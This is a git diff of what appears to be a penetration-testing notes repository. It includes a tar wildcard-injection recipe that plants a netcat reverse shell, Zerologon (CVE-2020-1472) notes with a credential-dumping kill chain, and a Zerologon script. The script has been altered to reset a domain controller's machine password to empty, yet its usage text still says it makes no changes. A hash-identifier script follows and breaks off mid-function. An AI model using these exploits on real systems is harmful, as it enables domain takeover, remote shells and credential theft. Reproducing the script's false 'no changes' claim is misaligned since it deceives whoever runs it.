@ -0,0 +1,13 @@
# Wildcard usage
* [Leon Juranic has shown it](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
## Another Example
* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
```

4
exploit/windows/docs/impacket.md Normal file
View File

@ -0,0 +1,4 @@
# Impacket
* [Repo](https://github.com/SecureAuthCorp/impacket)

1
exploit/windows/impacket Submodule

@ -0,0 +1 @@
Subproject commit 6da655ca9ac4f9c2a207ea47e79d089044accd78

1
exploit/windows/windows-kernel-exploits Submodule

@ -0,0 +1 @@
Subproject commit 2b944b52ee30f8833a21f0805d2627ca1f15383a

57
exploit/windows/zero_logon/zero_logon.md Normal file
View File

@ -0,0 +1,57 @@
# Zero Logon
[CVE-2020-1472](http://cve.circl.lu/cve/CVE-2020-1472)
## MS-NRPC (Microsoft NetLogon Remote Protocol)
* ComputeNetlogonCredential
* IV is `0` of AES-CFB8
* Machine accounts got no limit on failed login attempts (64 bit alnum password)
## Kill Chain
Zero Logon to bypass authentication on the Domain Controller's Machine Account -> Run `Secretsdump.py` to dump credentials -> Crack/Pass Domain Admin Hashes -> ??? -> Profit
## MS-NRPC Logon
* Netlogon handshake between Client (domain-joined computer) and Server (domain-controller).
* RPC traffic
```mermaid
sequenceDiagram
participant Client
participant Server
Client ->> Server: Client challenge
Server ->> Client: Server challenge, Session Key = KDF(secret, challenges)
Client ->> Server: Client credential, Encrypt(K_sess, client challenge)
Server ->> Client: Client credential, Encrypt(K_sess, client challenge)
Client ->> Server: Signed + sealed with session key: Procedure call with authenticator
```
* Zero Logon attack. Zeroing parameters and retrying handshakes with an empty password on the domain controller.
```mermaid
sequenceDiagram
participant Client
participant Server
Client ->> Server: NetrServerReqChallenge (challenge=0000...00)
Server ->> Client: Server Challenge
Client ->> Server: NetrServerAuthenticate3 (identity=DC; credential=0000...00; sign/seal=0)
Server ->> Client: OK
Client ->> Server: NetrServerPasswordSet2 (target=DC; authenticator=0000...00; timestamp=0; enc.password=0000...00)
```
1. Client sends 16 Bytes of `0` as Nonce to domain-controller
2. Server receives NetServerReqChallenge and generates challenge (Nonce). Sends it to the client.
3. __NetrServerAuthenticate3__ method is generated as NetLogon credentials. Contains the following
1. __Custom Binding Handle__
2. __Account Name__
3. __Secure Channel Type__, nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
4. __Computer Name__, Domain Controller DC01
5. __Client Credential String__, 16 Bytes of `\x00`
6. __Negotiation Flags__, value observed from a Win10 client with Sign/Seal flags disabled: 0x212fffff Provided by Secura
4. NetrServerAuthenticate is received by server. Responds success if positive to the client.
5. If same values is calculated by the server, mutual agreement is confirmed by the client as well.
## PoC
* [Secura's PoC](https://github.com/SecuraBV/CVE-2020-1472)
* [NetrServerPasswordSet2](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81)
* [NetServerAuthenticate3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9)
* [Authenticator](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/76c93227-942a-4687-ab9d-9d972ffabdab)
* [NETLOGON_CREDENTIALS](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/d55e2632-7163-4f6c-b662-4b870e8cc1cd)

100
exploit/windows/zero_logon/zero_logon_PoC.py Normal file
View File

@ -0,0 +1,100 @@
#!/usr/bin/env python3
from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto
import hmac, hashlib, struct, sys, socket, time
from binascii import hexlify, unhexlify
from subprocess import check_call
# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
def fail(msg):
print(msg, file=sys.stderr)
print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
sys.exit(2)
def try_zero_authenticate(dc_handle, dc_ip, target_computer):
# Connect to the DC's Netlogon service.
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
# Use an all-zero challenge and credential.
plaintext = b'\x00' * 8
ciphertext = b'\x00' * 8
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
flags = 0x212fffff
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00', ciphertext, flags
)
# It worked!
assert server_auth['ErrorCode'] == 0
# ADDED BY mnemonic_daemon
#
newPassRequest = nrpc.NetrServerPasswordSet2()
newPassRequest['PrimaryName'] = dc_handle + '\x00'
newPassRequest['AccountName'] = target_computer + '$\x00'
newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
auth = nrpc.NETLOGON_AUTHENTICATOR()
auth['Credential'] = b'\x00' * 8
auth['Timestamp'] = 0
newPassRequest['Authenticator'] = auth
newPassRequest['ComputerName'] = target_computer + '\x00'
newPassRequest['ClearNewPassword'] = b'\x00' * 516
rpc_con.request(newPassRequest)
return rpc_con
except nrpc.DCERPCSessionError as ex:
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
if ex.get_error_code() == 0xc0000022:
return None
else:
fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
except BaseException as ex:
fail(f'Unexpected error: {ex}.')
def perform_attack(dc_handle, dc_ip, target_computer):
# Keep authenticating until succesfull. Expected average number of attempts needed: 256.
print('Performing authentication attempts...')
rpc_con = None
for attempt in range(0, MAX_ATTEMPTS):
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
if rpc_con == None:
print('=', end='', flush=True)
else:
break
if rpc_con:
print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
else:
print('\nAttack failed. Target is probably patched.')
sys.exit(1)
if __name__ == '__main__':
if not (3 <= len(sys.argv) <= 4):
print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
sys.exit(1)
else:
[_, dc_name, dc_ip] = sys.argv
dc_name = dc_name.rstrip('$')
perform_attack('\\\\' + dc_name, dc_ip, dc_name)

592
hashes/hash-id.py Normal file
View File

@ -0,0 +1,592 @@
#!/usr/bin/env python
# encoding: utf-8
# Hash Identifier
# By Zion3R
# www.Blackploit.com
# Root@Blackploit.com
from builtins import input
from sys import argv, exit
version = 1.2
logo=''' #########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################'''
algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
# hash.islower() minusculas
# hash.isdigit() numerico
# hash.isalpha() letras
# hash.isalnum() alfanumerico
def CRC16(hash):
hs='4607'
if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101020")
def CRC16CCITT(hash):
hs='3d08'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101040")
def FCS16(hash):
hs='0e5b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101060")
def CRC32(hash):
hs='b33fd057'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102040")
def ADLER32(hash):
hs='0607cb42'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102020")
def CRC32B(hash):
hs='b764a0d9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102060")
def XOR32(hash):
hs='0000003f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102080")
def GHash323(hash):
hs='80000000'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103040")
def GHash325(hash):
hs='85318985'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103020")
def DESUnix(hash):
hs='ZiY8YtDKXJwYQ'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
jerar.append("104020")
def MD5Half(hash):
hs='ae11fd697ec92c7c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105060")
def MD5Middle(hash):
hs='7ec92c7c98de3fac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105040")
def MySQL(hash):
hs='63cea4673fd25f46'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105020")
def DomainCachedCredentials(hash):
hs='f42005ec1afe77967cbc83dce1b4d714'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106025")
def Haval128(hash):
hs='d6e3ec49aa0f138a619f27609022df10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106160")
def Haval128HMAC(hash):
hs='3ce8b0ffd75bc240fc7d967729cd6637'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106165")
def MD2(hash):
hs='08bbef4754d98806c373f2cd7d9a43c4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106060")
def MD2HMAC(hash):
hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106120")
def MD4(hash):
hs='a2acde400e61410e79dacbdfc3413151'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106040")
def MD4HMAC(hash):
hs='6be20b66f2211fe937294c1c95d1cd4f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106100")
def MD5(hash):
hs='ae11fd697ec92c7c98de3fac23aba525'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106020")
def MD5HMAC(hash):
hs='d57e43d2c7e397bf788f66541d6fdef9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106080")
def MD5HMACWordpress(hash):
hs='3f47886719268dfa83468630948228f6'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106140")
def NTLM(hash):
hs='cc348bace876ea440a28ddaeb9fd3550'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106029")
def RAdminv2x(hash):
hs='baea31c728cbf0cd548476aa687add4b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106027")
def RipeMD128(hash):
hs='4985351cd74aff0abc5a75a0c8a54115'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106180")
def RipeMD128HMAC(hash):
hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106185")
def SNEFRU128(hash):
hs='4fb58702b617ac4f7ca87ec77b93da8a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106200")
def SNEFRU128HMAC(hash):
hs='59b2b9dcc7a9a7d089cecf1b83520350'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106205")
def Tiger128(hash):
hs='c086184486ec6388ff81ec9f23528727'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106220")
def Tiger128HMAC(hash):
hs='c87032009e7c4b2ea27eb6f99723454b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106225")
def md5passsalt(hash):
hs='5634cc3b922578434d6e9342ff5913f7'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106240")
def md5saltmd5pass(hash):
hs='245c5763b95ba42d4b02d44bbcd916f1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106260")
def md5saltpass(hash):
hs='22cc5ce1a1ef747cd3fa06106c148dfa'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106280")
def md5saltpasssalt(hash):
hs='469e9cdcaff745460595a7a386c4db0c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106300")
def md5saltpassusername(hash):
hs='9ae20f88189f6e3a62711608ddb6f5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106320")
def md5saltmd5pass(hash):
hs='aca2a052962b2564027ee62933d2382f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106340")
def md5saltmd5passsalt(hash):
hs='de0237dc03a8efdf6552fbe7788b2fdd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106360")
def md5saltmd5passsalt(hash):
hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106380")
def md5saltmd5saltpass(hash):
hs='d8f3b3f004d387086aae24326b575b23'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106400")
def md5saltmd5md5passsalt(hash):
hs='81f181454e23319779b03d74d062b1a2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106420")
def md5username0pass(hash):
hs='e44a60f8f2106492ae16581c91edb3ba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106440")
def md5usernameLFpass(hash):
hs='654741780db415732eaee12b1b909119'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106460")
def md5usernamemd5passsalt(hash):
hs='954ac5505fd1843bbb97d1b2cda0b98f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106480")
def md5md5pass(hash):
hs='a96103d267d024583d5565436e52dfb3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106500")
def md5md5passsalt(hash):
hs='5848c73c2482d3c2c7b6af134ed8dd89'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106520")
def md5md5passmd5salt(hash):
hs='8dc71ef37197b2edba02d48c30217b32'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106540")
def md5md5saltpass(hash):
hs='9032fabd905e273b9ceb1e124631bd67'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106560")
def md5md5saltmd5pass(hash):
hs='8966f37dbb4aca377a71a9d3d09cd1ac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106580")
def md5md5usernamepasssalt(hash):
hs='4319a3befce729b34c3105dbc29d0c40'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106600")
def md5md5md5pass(hash):
hs='ea086739755920e732d0f4d8c1b6ad8d'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106620")
def md5md5md5md5pass(hash):
hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106640")
def md5md5md5md5md5pass(hash):
hs='4548d2c062933dff53928fd4ae427fc0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106660")
def md5sha1pass(hash):
hs='cb4ebaaedfd536d965c452d9569a6b1e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106680")
def md5sha1md5pass(hash):
hs='099b8a59795e07c334a696a10c0ebce0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106700")
def md5sha1md5sha1pass(hash):
hs='06e4af76833da7cc138d90602ef80070'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106720")
def md5strtouppermd5pass(hash):
hs='519de146f1a658ab5e5e2aa9b7d2eec8'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106740")
def LineageIIC4(hash):
hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
jerar.append("107080")
def MD5phpBB3(hash):
hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
jerar.append("107040")
def MD5Unix(hash):
hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
jerar.append("107060")
def MD5Wordpress(hash):
hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
jerar.append("107020")
def MD5APR(hash):
hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
jerar.append("108020")
def Haval160(hash):
hs='a106e921284dd69dad06192a4411ec32fce83dbb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109100")
def Haval160HMAC(hash):
hs='29206f83edc1d6c3f680ff11276ec20642881243'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109200")
def MySQL5(hash):
hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109040")
def MySQL160bit(hash):
hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
jerar.append("109060")
def RipeMD160(hash):
hs='dc65552812c66997ea7320ddfb51f5625d74721b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109120")
def RipeMD160HMAC(hash):
hs='ca28af47653b4f21e96c1235984cb50229331359'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109180")
def SHA1(hash):
hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109020")
def SHA1HMAC(hash):
hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109140")
def SHA1MaNGOS(hash):
hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109220")
def SHA1MaNGOS2(hash):
hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109240")
def Tiger160(hash):
hs='c086184486ec6388ff81ec9f235287270429b225'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109080")
def Tiger160HMAC(hash):
hs='6603161719da5e56e1866e4f61f79496334e6a10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109160")
def sha1passsalt(hash):
hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109260")
def sha1saltpass(hash):
hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109280")
def sha1saltmd5pass(hash):
hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109300")
def sha1saltmd5passsalt(hash):
hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109320")
def sha1saltsha1pass(hash):
hs='58714327f9407097c64032a2fd5bff3a260cb85f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109340")
def sha1saltsha1saltsha1pass(hash):
hs='cc600a2903130c945aa178396910135cc7f93c63'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109360")
def sha1usernamepass(hash):
hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109380")
def sha1usernamepasssalt(hash):
hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109400")
def sha1md5pass(hash):
hs='fa960056c0dea57de94776d3759fb555a15cae87'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("1094202")
def sha1md5passsalt(hash):
hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109440")
def sha1md5sha1pass(hash):
hs='8bceaeed74c17571c15cdb9494e992db3c263695'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109460")
def sha1sha1pass(hash):
hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109480")
def sha1sha1passsalt(hash):
hs='780d43fa11693b61875321b6b54905ee488d7760'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109500")
def sha1sha1passsubstrpass03(hash):
hs='5ed6bc680b59c580db4a38df307bd4621759324e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109520")
def sha1sha1saltpass(hash):
hs='70506bac605485b4143ca114cbd4a3580d76a413'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109540")
def sha1sha1sha1pass(hash):
hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
